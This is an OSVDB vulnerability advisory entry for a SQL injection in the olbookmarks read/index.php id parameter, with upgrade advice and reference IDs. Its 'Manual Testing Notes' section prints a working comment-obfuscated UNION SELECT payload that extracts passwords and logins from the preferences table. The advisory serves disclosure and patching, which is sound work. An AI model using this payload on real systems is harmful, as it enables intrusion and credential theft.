olbookmarks read/index.php id Variable SQL Injection

2007-05-21T11:18:46
ID OSVDB:36492
Type osvdb
Reporter OSVDB
Modified 2007-05-21T11:18:46

Description

Solution Description

Upgrade to version 0.7.5 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Manual Testing Notes

/read/index.php?name=alex&id=-1//union//select//0,1,2,3,4,5,password,login,8,9,10,11,12//from/*/preferences/

References:

Secunia Advisory ID:25356 Related OSVDB ID: 36493 Mail List Post: http://attrition.org/pipermail/vim/2007-May/001623.html ISS X-Force ID: 34414 Generic Exploit URL: http://www.milw0rm.com/exploits/3964 CVE-2007-2817 Bugtraq ID: 24085